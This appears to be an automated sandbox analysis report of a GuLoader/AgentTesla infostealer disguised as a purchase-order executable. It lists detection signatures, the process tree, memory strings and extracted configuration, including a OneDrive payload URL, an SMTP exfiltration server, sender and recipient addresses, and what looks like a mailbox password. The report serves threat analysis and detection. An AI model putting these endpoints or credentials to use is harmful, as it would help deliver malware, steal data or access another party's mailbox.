Play interactive tour

Edit tour

Windows Analysis Report Purchase Order PO20211027STK.exe

Overview

General Information

Sample Name:	Purchase Order PO20211027STK.exe
Analysis ID:	531732
MD5:	2f2102ec5776497950e89e419515efee
SHA1:	1d3dd4ed88af22c3de29c918b37db6f0b73c94c4
SHA256:	7768da29cc4ef93cb4790f664e139d1d8c2972e22fe8840b6b86c50e15dba347
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

Hides threads from debuggers

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Executable has a suspicious name (potential lure to open the executable)

C2 URLs / IPs found in malware configuration

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Uses SMTP (mail sending)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

Purchase Order PO20211027STK.exe (PID: 4660 cmdline: "C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" MD5: 2F2102EC5776497950E89E419515EFEE)

SPORENE.exe (PID: 2100 cmdline: C:\Users\user\AppData\Local\Temp\SPORENE.exe MD5: 582A642DF36CDAC38982E4842F370B44)

CasPol.exe (PID: 528 cmdline: C:\Users\user\AppData\Local\Temp\SPORENE.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "qualitat@construccionsjpallas.comzXHR1YDJL5smtp.construccionsjpallas.comfrankkeneth01@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE98540B&r"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000A.00000000.214269025674.0000000000F00000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 528	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 528	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000A.00000000.214269025674.0000000000F00000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE98540B&r"}
Source: SPORENE.exe.2100.4.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "qualitat@construccionsjpallas.comzXHR1YDJL5smtp.construccionsjpallas.comfrankkeneth01@gmail.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: Purchase Order PO20211027STK.exe

ReversingLabs: Detection: 15%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_013D92D0 CryptUnprotectData,		10_2_013D92D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_013D99A8 CryptUnprotectData,		10_2_013D99A8

Source: Purchase Order PO20211027STK.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: Purchase Order PO20211027STK.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\SPORENE.pdb source: Purchase Order PO20211027STK.exe, 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp, SPORENE.exe.2.dr

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe	Code function: 2_2_00406873 FindFirstFileW,FindClose,	2_2_00406873
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe	Code function: 2_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405C49
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe	Code function: 2_2_0040290B FindFirstFileW,	2_2_0040290B

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49839 -> 134.0.9.148:587

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&r

Source: Joe Sandbox View

ASN Name: CDMONsistemescdmoncomES CDMONsistemescdmoncomES

Source: global traffic

TCP traffic: 192.168.11.20:49839 -> 134.0.9.148:587

Source: global traffic

TCP traffic: 192.168.11.20:49839 -> 134.0.9.148:587

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	String found in binary or memory: http://SukKLs.com
Source: CasPol.exe, 0000000A.00000002.219005375157.00000000010E9000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000003.214542533887.00000000010EB000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.214536706012.00000000010EB000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.214542972543.00000000010ED000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.214536282271.00000000010F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 0000000A.00000002.219005375157.00000000010E9000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000003.214542533887.00000000010EB000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.214536706012.00000000010EB000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.214542972543.00000000010ED000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.214536282271.00000000010F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Purchase Order PO20211027STK.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Purchase Order PO20211027STK.exe, 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp, SPORENE.exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Purchase Order PO20211027STK.exe, 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp, SPORENE.exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: CasPol.exe, 0000000A.00000002.219017335150.000000001E078000.00000004.00000001.sdmp	String found in binary or memory: http://smtp.construccionsjpallas.com
Source: Purchase Order PO20211027STK.exe, 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp, SPORENE.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Purchase Order PO20211027STK.exe, 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp, SPORENE.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Purchase Order PO20211027STK.exe, 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp, SPORENE.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: CasPol.exe, 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%4
Source: CasPol.exe, 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: CasPol.exe, 0000000A.00000002.219017335150.000000001E078000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.215446466845.000000001CDB1000.00000004.00000001.sdmp	String found in binary or memory: https://bBdyMHz8DHQmQ5qFFNz.net
Source: Purchase Order PO20211027STK.exe, 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp, SPORENE.exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Purchase Order PO20211027STK.exe, 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp, SPORENE.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Purchase Order PO20211027STK.exe, 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp, SPORENE.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: CasPol.exe, 0000000A.00000003.214542972543.00000000010ED000.00000004.00000001.sdmp	String found in binary or memory: https://ervtqq.bl.files.1drv.com/
Source: CasPol.exe, 0000000A.00000003.214536706012.00000000010EB000.00000004.00000001.sdmp	String found in binary or memory: https://ervtqq.bl.files.1drv.com/.
Source: CasPol.exe, 0000000A.00000002.219005375157.00000000010E9000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000003.214542533887.00000000010EB000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.214542972543.00000000010ED000.00000004.00000001.sdmp	String found in binary or memory: https://ervtqq.bl.files.1drv.com/y4mRWRDE7pcrW6w0EUTN84QjMAtO1dpCLEwXIJU8OszKkAmv-_nhkZHLAvXSNrUdeon
Source: CasPol.exe, 0000000A.00000003.214542972543.00000000010ED000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.214536282271.00000000010F0000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.219005034724.00000000010A4000.00000004.00000020.sdmp	String found in binary or memory: https://ervtqq.bl.files.1drv.com/y4mjsZiy6S_ONFJ1Il5BkM5ipQEe7rgpRSJNcHXx-eH9OxEQcwqSz5uJCiVh7AEhgFP
Source: CasPol.exe, 0000000A.00000002.219004779835.000000000106B000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: CasPol.exe, 0000000A.00000002.219005034724.00000000010A4000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21126&authkey=AMKTKwd
Source: CasPol.exe, 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

Code function: 2_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

2_2_004056DE

System Summary:

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Purchase Order PO20211027STK.exe

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: Purchase Order PO20211027STK.exe

Static file information: Suspicious name

Source: Purchase Order PO20211027STK.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

Code function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

2_2_0040352D

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe	Code function: 2_2_0040755C	2_2_0040755C
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe	Code function: 2_2_00406D85	2_2_00406D85
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Code function: 4_2_00401724	4_2_00401724
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00BA0040	10_2_00BA0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00BA6908	10_2_00BA6908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00BA13B8	10_2_00BA13B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E41130	10_2_00E41130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E43A50	10_2_00E43A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E44320	10_2_00E44320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E4CC90	10_2_00E4CC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E4BF30	10_2_00E4BF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E43708	10_2_00E43708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_0103DB50	10_2_0103DB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_01035BC8	10_2_01035BC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_0103BEF8	10_2_0103BEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_010344F8	10_2_010344F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_01036610	10_2_01036610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_013D5D18	10_2_013D5D18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_013DBD40	10_2_013DBD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_013DE808	10_2_013DE808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_013D0040	10_2_013D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_013D6E40	10_2_013D6E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_013DB808	10_2_013DB808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_013DBCE2	10_2_013DBCE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_014C8780	10_2_014C8780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_014C1B85	10_2_014C1B85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_014C0C08	10_2_014C0C08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_014C4E28	10_2_014C4E28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_014CA308	10_2_014CA308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_014C0FB8	10_2_014C0FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_1DED5E48	10_2_1DED5E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_1DED470C	10_2_1DED470C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_1DED6B30	10_2_1DED6B30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: String function: 00E46280 appears 52 times

Source: Purchase Order PO20211027STK.exe, 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameSPORENE.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDNB10 vs Purchase Order PO20211027STK.exe
Source: Purchase Order PO20211027STK.exe, 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameSPORENE.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDNB10 vs Purchase Order PO20211027STK.exe

Source: SPORENE.exe.2.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\SPORENE.exe 361DEDDF3E436753730DBB20842FBD6D1EF2EC27C56CD9DA99E87751C3BBE890

Source: Purchase Order PO20211027STK.exe

ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

File read: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

Jump to behavior

Source: Purchase Order PO20211027STK.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe "C:\Users\user\Desktop\Purchase Order PO20211027STK.exe"
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe	Process created: C:\Users\user\AppData\Local\Temp\SPORENE.exe C:\Users\user\AppData\Local\Temp\SPORENE.exe
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\SPORENE.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe	Process created: C:\Users\user\AppData\Local\Temp\SPORENE.exe C:\Users\user\AppData\Local\Temp\SPORENE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\SPORENE.exe	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

2_2_0040352D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

File created: C:\Users\user\AppData\Local\Temp\nsu61C.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/2@3/1

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

Code function: 2_2_004021AA CoCreateInstance,

2_2_004021AA

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

Code function: 2_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

2_2_0040498A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_03

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Purchase Order PO20211027STK.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 0000000A.00000000.214269025674.0000000000F00000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Code function: 4_2_03F23DE9 push edi; iretd	4_2_03F23E03
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Code function: 4_2_03F21993 push 00000049h; retf	4_2_03F219D3
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Code function: 4_2_03F2279C push ss; ret	4_2_03F227C2
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Code function: 4_2_03F2307C push edi; iretd	4_2_03F23085
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Code function: 4_2_03F23E5B push edi; iretd	4_2_03F23E03
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Code function: 4_2_03F21936 push 00000049h; retf	4_2_03F219D3

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

File created: C:\Users\user\AppData\Local\Temp\SPORENE.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
